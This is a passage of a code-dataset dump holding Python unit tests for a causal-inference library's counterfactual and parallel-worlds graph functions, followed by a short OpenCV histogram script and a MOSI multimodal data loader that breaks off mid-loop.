self.assertFalse(has_same_function(X, D))\n self.assertFalse(has_same_function(X @ ~X, W @ ~X))\n self.assertFalse(has_same_function(X @ ~X, X))\n self.assertTrue(has_same_function(D, D @ ~x))\n self.assertTrue(has_same_function(Z @ ~x, Z))\n self.assertTrue(has_same_function(Z @ ~x, Z @ -d))\n self.assertTrue(has_same_function(Z @ -d, Z))\n self.assertTrue(has_same_function(Z @ (-d, -z), Z @ (-x, -z)))\n self.assertTrue(has_same_function(Z @ (-d, -z), Z @ (-x, +z)))\n self.assertFalse(has_same_function(Z @ (-d, -z), Z @ (-d, +x)))\n\n def test_nodes_attain_same_value(self):\n \"\"\"Test that two variables attain the same value.\"\"\"\n event: Event = {D: -d}\n self.assertTrue(nodes_attain_same_value(figure_11a.graph, event, D, D @ -d))\n self.assertTrue(nodes_attain_same_value(figure_11a.graph, event, D @ -d, D))\n self.assertTrue(\n nodes_attain_same_value(\n NxMixedGraph.from_edges(directed=[(D @ +d, Z @ +d)]), event, D @ +d, D @ +d\n )\n )\n self.assertTrue(nodes_attain_same_value(figure_9b.graph, event, D, D))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D @ -d, D))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D, D @ -d))\n self.assertFalse(nodes_attain_same_value(figure_11a.graph, event, Z, Z @ +x))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D, X))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, X, D))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D, X @ -d))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, X @ -d, D))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D, X @ -d))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D @ -d, D))\n # This should get us onto the return False on line 56\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, Y @ -X, X))\n # This one should trigger the False on line 59\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, {Y @ -X: -Y, Y: +Y}, Y @ -X, Y))\n # This one will trigger the True on line 61, but I'm not sure if the event really makes sense\n\n self.assertTrue(nodes_attain_same_value(figure_9b.graph, {Y @ -X: -Y, Y: -Y}, Y @ -X, Y))\n # I think these two should get the falses on lines 64 and 69\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, {Y @ -X: -Y}, Y @ -X, Y))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, {Y: +Y}, Y @ -X, Y))\n # These two should get the False on line 73\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, {}, Y @ -X, Y))\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, {}, Y, Y @ -X))\n # These two should get the True on line 74\n self.assertTrue(\n nodes_attain_same_value(NxMixedGraph.from_edges(undirected=[(+Y, -Y)]), {}, +Y, -Y)\n )\n self.assertFalse(nodes_attain_same_value(figure_9b.graph, event, D @ -X, D))\n\n def test_has_same_confounders(self):\n \"\"\"Check whether two nodes have the same confounding edges.\"\"\"\n self.assertFalse(has_same_confounders(figure_9b.graph, D, D))\n self.assertFalse(has_same_confounders(figure_9b.graph, D, D @ -d))\n self.assertFalse(has_same_confounders(figure_9b.graph, D @ -d, D))\n self.assertTrue(has_same_confounders(figure_9b.graph, D @ -x, D))\n self.assertTrue(has_same_confounders(figure_11a.graph, D @ -d, D))\n self.assertTrue(has_same_confounders(figure_9b.graph, D, D @ -x))\n\n def test_parents_attain_same_values(self):\n \"\"\"Test that the parents of two nodes attain the same value.\"\"\"\n graph = figure_9b.graph\n event: Event = {Y @ -x: -y, D: -d, Z @ -d: -z, X: +x}\n self.assertTrue(parents_attain_same_values(figure_11a.graph, event, Z, Z @ -d))\n self.assertTrue(parents_attain_same_values(figure_11a.graph, event, Z, Z @ -x))\n self.assertTrue(parents_attain_same_values(figure_11a.graph, event, Z @ -d, Z @ -x))\n self.assertTrue(parents_attain_same_values(figure_11a.graph, event, D, D @ -d))\n self.assertFalse(parents_attain_same_values(graph, event, Z, Z @ -d))\n self.assertFalse(parents_attain_same_values(figure_9b.graph, event, D, D @ -d))\n self.assertFalse(parents_attain_same_values(figure_9b.graph, event, X, X @ -x))\n self.assertFalse(\n parents_attain_same_values(\n NxMixedGraph.from_edges(directed=[(Z, X), (Z, Y), (W, Y)]), event, X, Y\n )\n )\n self.assertFalse(\n parents_attain_same_values(\n NxMixedGraph.from_edges(\n directed=[(X @ -x, Y @ -x), (X @ +x, Y @ +x)], undirected=[(Y @ -x, Y @ +x)]\n ),\n {Y @ -x: -y, Y @ +x: +y},\n Y @ -x,\n Y @ +x,\n )\n )\n\n def test_nodes_have_same_domain_of_values(self):\n \"\"\"Test that two nodes have the same domain of values.\"\"\"\n graph = figure_9b.graph\n event = {Y @ -x: -y, X: +x, D: -d, Z @ -d: -z}\n self.assertTrue(nodes_have_same_domain_of_values(graph, event, D, D @ -x))\n self.assertFalse(nodes_have_same_domain_of_values(graph, event, D, D @ -d))\n self.assertFalse(\n nodes_have_same_domain_of_values(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +x)], undirected=[(Y, Y @ +x)]\n ),\n {Y @ +x: +y, Y @ -x: -y},\n X,\n X @ +x,\n )\n )\n self.assertTrue(nodes_have_same_domain_of_values(figure_9b.graph, event, D @ -X, D))\n self.assertFalse(nodes_have_same_domain_of_values(figure_9b.graph, event, X, Y))\n self.assertFalse(\n nodes_have_same_domain_of_values(\n NxMixedGraph.from_edges(\n directed=[(X @ +x, Y @ +x), (X @ -x, Y @ -x), (X, Y)],\n undirected=[(Y @ -x, Y @ +x), (Y @ +x, Y), (Y @ -x, Y)],\n ),\n {Y @ -x: -y, Y @ +x: +y},\n X @ -x,\n X @ +x,\n )\n )\n self.assertTrue(\n nodes_have_same_domain_of_values(\n NxMixedGraph.from_edges(\n directed=[(X @ +x, Y @ +x), (X @ -x, Y @ -x), (X, Y)],\n undirected=[(Y @ -x, Y @ +x), (Y @ +x, Y), (Y @ -x, Y)],\n ),\n {Y @ -x: -y, Y @ +x: +y},\n X @ +x,\n X @ +x,\n )\n )\n self.assertTrue(\n nodes_have_same_domain_of_values(\n NxMixedGraph.from_edges(\n directed=[(X @ +x, Y @ +x), (X @ -x, Y @ -x), (X, Y)],\n undirected=[(Y @ -x, Y @ +x), (Y @ +x, Y), (Y @ -x, Y)],\n ),\n {Y @ -x: +y, Y @ +x: +y},\n Y @ -x,\n Y @ +x,\n )\n )\n\n def test_value_of_self_intervention(self):\n \"\"\"Return the value of a self intervention.\"\"\"\n self.assertIsNone(value_of_self_intervention(X))\n self.assertEqual(+x, value_of_self_intervention(X @ +x))\n self.assertEqual(-x, value_of_self_intervention(X @ (-x, -y, -d)))\n self.assertIsNone(value_of_self_intervention(X @ -y))\n\n def test_extract_interventions(self):\n \"\"\"Test that all interventions are extracted.\"\"\"\n event = {X: +x, D: -d, Z @ -d: -z}\n expected_worlds = {frozenset({-d})}\n self.assertEqual(expected_worlds, extract_interventions(event))\n\n def test_get_worlds(self):\n \"\"\"Test that all interventions within each world of a counterfactual conjunction are generated.\"\"\"\n self.assert_uedge_set_equal(\n {frozenset([-D]), frozenset([~X])}, extract_interventions([Y @ ~X, X, Z @ -D, D])\n )\n self.assert_uedge_set_equal(\n {frozenset([-D]), frozenset([~X, -Z])},\n extract_interventions([Y @ (~X, -Z), X, Z @ -D, D]),\n )\n\n def test_node_not_an_intervention_in_world(self):\n \"\"\"Test that a node is not an intervention in a world.\"\"\"\n self.assertTrue(node_not_an_intervention_in_world(world=frozenset([-x]), node=Y))\n self.assertFalse(node_not_an_intervention_in_world(world=frozenset([-x, +z]), node=X))\n self.assertTrue(node_not_an_intervention_in_world(world=frozenset([-x, +x]), node=Y))\n self.assertFalse(node_not_an_intervention_in_world(world=frozenset([-x]), node=X))\n self.assertFalse(node_not_an_intervention_in_world(world=frozenset([-x, -y]), node=Y))\n self.assertFalse(node_not_an_intervention_in_world(world=frozenset([-x, +y]), node=Y))\n self.assertFalse(node_not_an_intervention_in_world(world=frozenset([-x, +y, -y]), node=Y))\n with self.assertRaises(TypeError):\n node_not_an_intervention_in_world(world=frozenset([-x]), node=+Y)\n\n with self.assertRaises(TypeError):\n node_not_an_intervention_in_world(world=frozenset({-x}), node=X @ +x)\n\n def test_stitch_factual_and_dopplegangers(self):\n \"\"\"Test that factual variables and their dopplegangers are stitched together unless it is intervened upon.\"\"\"\n self.assert_uedge_set_equal(\n {(Y, Y @ -x)},\n stitch_factual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([-x])])\n ),\n )\n self.assert_uedge_set_equal(\n {(Y, Y @ +x)},\n stitch_factual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([+x])])\n ),\n )\n self.assert_uedge_set_equal(\n {(Y, Y @ +x), (Z, Z @ +x)},\n stitch_factual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)]),\n worlds=set([frozenset([+x])]),\n ),\n )\n self.assert_uedge_set_equal(\n {(Y, Y @ +x), (Z, Z @ +x)},\n stitch_factual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)], undirected=[(X, Z)]),\n worlds=set([frozenset([+x])]),\n ),\n )\n self.assert_uedge_set_equal(\n {(Y, Y @ +x), (Z, Z @ +x), (D, D @ +x), (X, X @ -d), (Y, Y @ -d), (Z, Z @ -d)},\n stitch_factual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n ),\n )\n self.assert_uedge_set_equal(\n {\n (Y, Y @ +x),\n (Z, Z @ +x),\n (D, D @ +x),\n (X, X @ -d),\n (Y, Y @ -d),\n (Z, Z @ -d),\n (W, W @ -d),\n (W, W @ +x),\n },\n stitch_factual_and_dopplegangers(\n graph=figure_9a.graph, worlds=set([frozenset([+x]), frozenset([-d])])\n ),\n )\n\n def test_is_not_self_intervened(self):\n \"\"\"Test that we can detect when a counterfactual variable intervenes on itself.\"\"\"\n self.assertFalse(is_not_self_intervened(Y @ (+x, -y)))\n self.assertTrue(is_not_self_intervened(Y @ (+x, -z)))\n self.assertFalse(is_not_self_intervened(Y @ (+x, +y)))\n\n def test_stitch_factual_and_doppleganger_neighbors(self):\n \"\"\"Test that factual variables and their dopplegangers are stitched together unless it is intervened upon.\"\"\"\n self.assert_uedge_set_equal(\n set(),\n stitch_factual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([-x])])\n ),\n )\n self.assert_uedge_set_equal(\n {(X, Y @ +x)},\n stitch_factual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)], undirected=[(X, Y)]),\n worlds=set([frozenset([+x])]),\n ),\n )\n self.assert_uedge_set_equal(\n {(X, Z @ +x)},\n stitch_factual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)], undirected=[(X, Z)]),\n worlds=set([frozenset([+x])]),\n ),\n )\n self.assert_uedge_set_equal(\n {(X, Z @ +x), (X, Z @ -d), (Z, X @ -d)},\n stitch_factual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n ),\n )\n\n def test_stitch_counterfactual_and_dopplegangers(self):\n \"\"\"Test counterfactual variables and their dopplegangers are stitched together unless it is intervened upon.\"\"\"\n self.assert_uedge_set_equal(\n set(),\n stitch_counterfactual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([-x])])\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n stitch_counterfactual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([+x])])\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n stitch_counterfactual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)]),\n worlds=set([frozenset([+x])]),\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n stitch_counterfactual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)], undirected=[(X, Z)]),\n worlds=set([frozenset([+x])]),\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({Z @ -d, Z @ +x}), frozenset({Y @ +x, Y @ -d})},\n set(\n stitch_counterfactual_and_dopplegangers(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({Y @ -d, Y @ +x}), frozenset({W @ +x, W @ -d}), frozenset({Z @ +x, Z @ -d})},\n stitch_counterfactual_and_dopplegangers(\n graph=figure_9a.graph, worlds=set([frozenset([+x]), frozenset([-d])])\n ),\n )\n\n def test_stitch_counterfactual_and_doppleganger_neighbors(self):\n \"\"\"Test that counterfactual variables and their neighbor dopplegangers are stitched together.\"\"\"\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([-x])])\n )\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([+x])])\n )\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)]),\n worlds=set([frozenset([+x])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)], undirected=[(X, Z)]),\n worlds=set([frozenset([+x])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({X @ -d, Z @ +x})},\n set(\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({X @ -d, Z @ +x}), frozenset({Y @ +x, Z @ -d}), frozenset({Y @ -d, Z @ +x})},\n set(\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z), (Y, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({X @ -d, Y @ +x})},\n stitch_counterfactual_and_doppleganger_neighbors(\n graph=figure_9a.graph, worlds=set([frozenset([+x]), frozenset([-d])])\n ),\n )\n\n def test_stitch_counterfactual_and_neighbors(self):\n \"\"\"Test counterfactual variables and their neighbors are stitched together.\"\"\"\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([-x])])\n )\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), worlds=set([frozenset([+x])])\n )\n ),\n )\n self.assert_uedge_set_equal(\n set(),\n set(\n stitch_counterfactual_and_neighbors(\n graph=NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z)]),\n worlds=set([frozenset([+x])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({Y @ +x, Z @ +x})},\n set(\n stitch_counterfactual_and_neighbors(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z)], undirected=[(X, Z), (Y, Z)]\n ),\n worlds=set([frozenset([+x])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({X @ -d, Z @ -d})},\n set(\n stitch_counterfactual_and_neighbors(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({Y @ +x, Z @ +x}), frozenset({Y @ -d, Z @ -d}), frozenset({Z @ -d, X @ -d})},\n set(\n stitch_counterfactual_and_neighbors(\n graph=NxMixedGraph.from_edges(\n directed=[(X, Y), (Y, Z), (D, X)], undirected=[(X, Z), (Y, Z)]\n ),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n )\n ),\n )\n self.assert_uedge_set_equal(\n {frozenset({X @ -d, Y @ -d})},\n stitch_counterfactual_and_neighbors(\n graph=figure_9a.graph, worlds=set([frozenset([+x]), frozenset([-d])])\n ),\n )\n\n def test_get_directed_edges(self):\n \"\"\"Test that the directed edges of a parallel world graph are correctly identified.\"\"\"\n self.assertEqual(\n {\n (X @ -d, Y @ -d),\n (Y @ -d, Z @ -d),\n (D @ -d, X @ -d),\n (X @ +x, Y @ +x),\n (Y @ +x, Z @ +x),\n },\n _get_directed_edges(\n NxMixedGraph.from_edges(directed=[(X, Y), (Y, Z), (D, X)]),\n worlds=set([frozenset([+x]), frozenset([-d])]),\n ),\n )\n\n def test_is_pw_equivalent(self):\n \"\"\"Test that two nodes in a parallel world graph are the same (lemma 24).\"\"\"\n event: Event = {Y @ -x: -y, D: -d, Z @ -d: -z, X: +x}\n self.assertTrue(is_pw_equivalent(figure_9b.graph, event, D @ -X, D))\n self.assertTrue(is_pw_equivalent(figure_9b.graph, event, X @ -D, X))\n self.assertTrue(is_pw_equivalent(figure_11a.graph, event, Z, Z @ -X))\n self.assertTrue(is_pw_equivalent(figure_11a.graph, event, W, W @ -d))\n self.assertTrue(is_pw_equivalent(figure_11a.graph, event, Z @ -x, Z))\n self.assertTrue(is_pw_equivalent(figure_11a.graph, event, Z @ -d, Z))\n self.assertTrue(is_pw_equivalent(figure_11a.graph, event, Z @ -x, Z @ -d))\n self.assertFalse(is_pw_equivalent(figure_11a.graph, event, D @ -d, D))\n self.assertTrue(is_pw_equivalent(figure_9b.graph, event, D @ -x, D))\n self.assertTrue(is_pw_equivalent(figure_11a.graph, event, Z @ -d, Z))\n self.assertFalse(is_pw_equivalent(figure_9b.graph, event, X, X @ -X))\n self.assertFalse(is_pw_equivalent(figure_9b.graph, event, Z, Z @ -X))\n self.assertFalse(is_pw_equivalent(figure_9b.graph, event, D, D @ -d))\n self.assertFalse(is_pw_equivalent(figure_9b.graph, event, X, X @ -x))\n self.assertFalse(is_pw_equivalent(figure_11a.graph, event, X @ -x, X))\n self.assertFalse(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +y), (X @ -x, Y @ -y)],\n undirected=[(Y @ +y, Y @ -y), (Y @ -y, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y},\n X @ +x,\n X @ -x,\n )\n )\n self.assertFalse(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +x), (X @ -x, Y @ -x)],\n undirected=[(Y @ +x, Y @ -x), (Y @ -x, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y},\n X,\n X @ -x,\n )\n )\n self.assertFalse(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +y), (X @ -x, Y @ -y)],\n undirected=[(Y @ +y, Y @ -y), (Y @ -y, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y},\n X,\n X @ +x,\n )\n )\n self.assertFalse(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +x), (X @ -x, Y @ -x)],\n undirected=[(Y @ +y, Y @ -x), (Y @ -x, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y},\n Y @ +x,\n Y @ -x,\n )\n )\n self.assertFalse(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +x), (X @ -x, Y @ -x)],\n undirected=[(Y @ +x, Y @ -x), (Y @ -x, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y},\n Y @ +x,\n Y,\n )\n )\n self.assertFalse(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +x), (X @ -x, Y @ -x)],\n undirected=[(Y @ +x, Y @ -x), (Y @ -x, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y},\n Y,\n Y @ -x,\n )\n )\n self.assertTrue(\n is_pw_equivalent(\n NxMixedGraph.from_edges(\n directed=[(X, Y), (X @ +x, Y @ +x), (X @ -x, Y @ -x)],\n undirected=[(Y @ +x, Y @ -x), (Y @ -x, Y)],\n ),\n {Y @ +x: +y, Y @ -x: -y, X: -x},\n Y,\n Y @ -x,\n )\n )\n\n def test_merge_pw(self):\n \"\"\"Test the parallel worlds graph after merging two nodes is correct (Lemma 25).\"\"\"\n cf_graph_1, preferred, eliminated = merge_pw(figure_9b.graph, D, D @ -X)\n cf_graph_2, preferred, eliminated = merge_pw(cf_graph_1, X, X @ D)\n # test that we swap the order of the nodes if the first is a counterfactual\n cf_graph_3, preferred, eliminated = merge_pw(cf_graph_2, Z @ -X, Z)\n cf_graph_4, preferred, eliminated = merge_pw(cf_graph_3, Z, Z @ D)\n cf_graph_5, preferred, eliminated = merge_pw(cf_graph_4, W, W @ D)\n cf_graph_6, preferred, eliminated = merge_pw(cf_graph_5, D @ -D, D)\n cf_graph_7, preferred, eliminated = merge_pw(cf_graph_6, Y, Y @ -D)\n # test that we sort the order of the nodes if both are counterfactual\n cf_graph_8, preferred8, eliminated8 = merge_pw(figure_9b.graph, W @ -d, W @ -x)\n # test that we sort the order of the nodes if the both are factual\n cf_graph_9, preferred9, eliminated9 = merge_pw(figure_9b.graph, W, Z)\n self.assert_graph_equal(figure_11a.graph, cf_graph_2)\n self.assert_graph_equal(figure_11b.graph, cf_graph_6)\n self.assert_graph_equal(figure_11c.graph, cf_graph_7)\n self.assert_graph_equal(merge_pw(figure_9b.graph, W @ -x, W @ -d)[0], cf_graph_8)\n self.assert_graph_equal(merge_pw(figure_9b.graph, Z, W)[0], cf_graph_9)\n self.assertTrue(D @ -d not in merge_pw(figure_11a.graph, Z, Z @ -d)[0].nodes())\n\n def test_is_inconsistent(self):\n r\"\"\"Test whether two nodes are inconsistent.\"\"\"\n self.assertTrue(is_inconsistent({D: -d, D @ +x: +d}, D, D @ ~X))\n self.assertTrue(is_inconsistent({D @ -x: -d, D @ +x: +d}, D @ +x, D @ -x))\n self.assertTrue(is_inconsistent({Y @ -x: -y, Y @ +x: +y}, Y @ +x, Y @ -x))\n\n def test_make_counterfactual_graph(self):\n r\"\"\"Test making a counterfactual graph.\n\n The invocation of **make-cg** with the graph in Figure 9(a) and the joint distribution\n :math:`P(y_x, x', z, d)` will result in the counterfactual graph shown in Fig. 9(c).\n The invocation of **make-cg** with the graph in Figure 9(a) and the joint distribution\n :math:`P(y_{x,z},x')` will result in the counterfactual graph shown in Fig. 9(d).\n \"\"\"\n actual_graph, actual_event = make_counterfactual_graph(\n figure_9a.graph, {Y @ -x: -y, X: +x, Z @ -d: -z, D: -d}\n )\n self.assert_graph_equal(figure_9c.graph, actual_graph)\n self.assertEqual({Y @ -x: -y, X: +x, Z: -z, D: -d}, actual_event)\n actual_graph2, actual_event2 = make_counterfactual_graph(\n figure_9a.graph, {Y @ (-x, -z): -y, X: +x}\n )\n expected_graph2, expected_event2 = figure_9d.graph, {Y @ (-x, -z): -y, X: +x}\n self.assertEqual(expected_event2, actual_event2)\n self.assert_graph_equal(expected_graph2, actual_graph2)\n\n # Check for inconsistent counterfactual values for merged nodes\n actual_graph3, actual_event3 = make_counterfactual_graph(\n graph=NxMixedGraph.from_edges(directed=[(D, Z), (Z, Y)]),\n event={Z @ -d: -z, Z: +z, D: -d},\n )\n self.assertIsNone(actual_event3)\n\n # # Check whether {Y_{+x,z,w): -y, X_w: -x} automatically simplifies to {Y_{z,w}: y, X: -x} (it should not)\n # actual_graph4, actual_event4 = make_counterfactual_graph(\n # graph=figure_9a.graph, event={X @ -W: X, Y @ (-W, +X, -Z): Y}\n # )\n # expected_event4 = {Y @ (-W, -Z): Y, X: X}\n # expected_graph4 = NxMixedGraph.from_edges(\n # nodes={W @ -W, Y @ (-W, +X, -Z), Z @ (-W, +X, -Z), X},\n # directed={(W @ -W, Y @ (-W, +X, -Z)), (Z @ (-W, +X, -Z), Y @ (-W, +X, -Z))},\n # undirected={frozenset({X, Y @ (-W, +X, -Z)})},\n # )\n # self.assertNotEqual(expected_event4, actual_event4)\n # self.assert_graph_equal(expected_graph4, actual_graph4)\n\n # Check whether the counterfactual graph is consistent (it is not)\n actual_graph5, actual_event5 = make_counterfactual_graph(\n graph=NxMixedGraph.from_edges(directed=[(W, X), (Z, X), (X, Y)]),\n event={Y @ -w: -y, Y @ -z: +y, X @ -w: +x, X @ -z: +x},\n )\n self.assertIsNone(actual_event5)\n\n # Check whether Probability of necessary and sufficient causation induces a W graph\n actual_graph6, actual_event6 = make_counterfactual_graph(\n graph=NxMixedGraph.from_edges(directed=[(X, Y)]), event={Y @ -x: -y, Y @ +x: +y}\n )\n expected_graph6 = NxMixedGraph.from_edges(\n directed=[(X @ -x, Y @ -x), (X @ +x, Y @ +x)], undirected=[(Y @ -x, Y @ +x)]\n )\n\n expected_event6 = {Y @ -x: -y, Y @ +x: +y}\n self.assert_graph_equal(expected_graph6, actual_graph6)\n self.assertEqual(expected_event6, actual_event6)\n\n # Check that a triplet world graph is not inconsistent\n actual_graph7, actual_event7 = make_counterfactual_graph(\n graph=NxMixedGraph.from_edges(\n directed=[(X, W), (W, Y), (D, Z), (Z, Y), (A, B), (B, Y)], undirected=[(X, Y)]\n ),\n event={Y @ +x: +y, X: -x, Z @ -d: -z, D: -d, A: +A},\n )\n self.assertIsNotNone(actual_event7)\n expected_graph7 = NxMixedGraph.from_edges(\n directed=[(D, Z), (B, Y @ +X), (W @ +X, Y @ +X), (Z, Y @ +X), (A, B), (X @ +X, W @ +X)],\n undirected=[(X, Y @ +X)],\n )\n self.assert_graph_equal(expected_graph7, actual_graph7)\n\n actual_graph8, actual_event8 = make_counterfactual_graph(\n graph=NxMixedGraph.from_edges(directed=[(X, Z), (Z, Y)]),\n event={Y @ -x: -y, Y @ +x: -y, Z @ +x: -z, Z @ -x: -z},\n )\n expected_graph8 = NxMixedGraph.from_edges(\n directed=[(X @ -x, Z @ -x), (Z @ -x, Y @ -x), (X @ +x, Z @ +x)],\n undirected=[(Z @ -x, Z @ +x)],\n )\n\n expected_event8 = {Y @ -X: -Y, Z @ +X: -Z, Z @ -X: -Z}\n self.assert_graph_equal(expected_graph8, actual_graph8)\n self.assertEqual(expected_event8, actual_event8)\n","sub_path":"tests/test_algorithm/test_cg.py","file_name":"test_cg.py","file_ext":"py","file_size_in_byte":33399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"189402936","text":"import numpy as np \nimport cv2 \nfrom matplotlib import pyplot as plt \n\n\nimg = cv2.imread(\"lena.jpg\") \nb,g,r = cv2.split(img)\n\n# Display the history of img, blue, green, red\nplt.hist(img.ravel(),256,[0,256])\nplt.hist(b.ravel(),256,[0,256])\nplt.hist(g.ravel(),256,[0,256])\nplt.hist(r.ravel(),256,[0,256])\nplt.show()\n\n# Display images \ncv2.imshow(\"Image\", img)\ncv2.imshow(\"Blue\", b)\ncv2.imshow(\"Green\", g)\ncv2.imshow(\"Red\", r)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"opencv_image_histogram_2.py","file_name":"opencv_image_histogram_2.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"579319711","text":"import numpy as np\nfrom mmdata import MOSI\n\ndef pad(data, max_len):\n \"\"\"A funtion for padding/truncating sequence data to a given lenght\"\"\"\n # recall that data at each time step is a tuple (start_time, end_time, feature_vector), we only take the vector\n data = np.array([feature[2] for feature in data])\n n_rows = data.shape[0]\n dim = data.shape[1]\n if max_len >= n_rows:\n diff = max_len - n_rows\n padding = np.zeros((diff, dim))\n padded = np.concatenate((padding, data))\n return padded\n else:\n return data[-max_len:]\n\ndef get_data(max_len_audio=20, max_len_text=15, max_len_visual=20):\n mosi = MOSI()\n embeddings = mosi.embeddings()\n facet = mosi.facet()\n covarep = mosi.covarep()\n sentiments = mosi.sentiments() # sentiment labels, real-valued. for this tutorial we'll binarize them\n train_ids = mosi.train()\n valid_ids = mosi.valid()\n test_ids = mosi.test()\n # sort through all the video ID, segment ID pairs\n train_set_ids = []\n for vid in train_ids:\n for sid in embeddings['embeddings'][vid].keys():\n if embeddings['embeddings'][vid][sid] and facet['facet'][vid][sid] and covarep['covarep'][vid][sid]:\n train_set_ids.append((vid, sid))\n\n valid_set_ids = []\n for vid in valid_ids:\n for sid in embeddings['embeddings'][vid].keys():\n if embeddings['embeddings'][vid][sid] and facet['facet'][vid][sid] and covarep['covarep'][vid][sid]:\n valid_set_ids.append((vid, sid))\n\n test_set_ids = []\n for vid in test_ids:\n for sid in embeddings['embeddings'][vid].keys():\n if embeddings['embeddings'][vid][sid] and facet['facet'][vid][sid] and covarep['covarep'][vid][sid]:\n 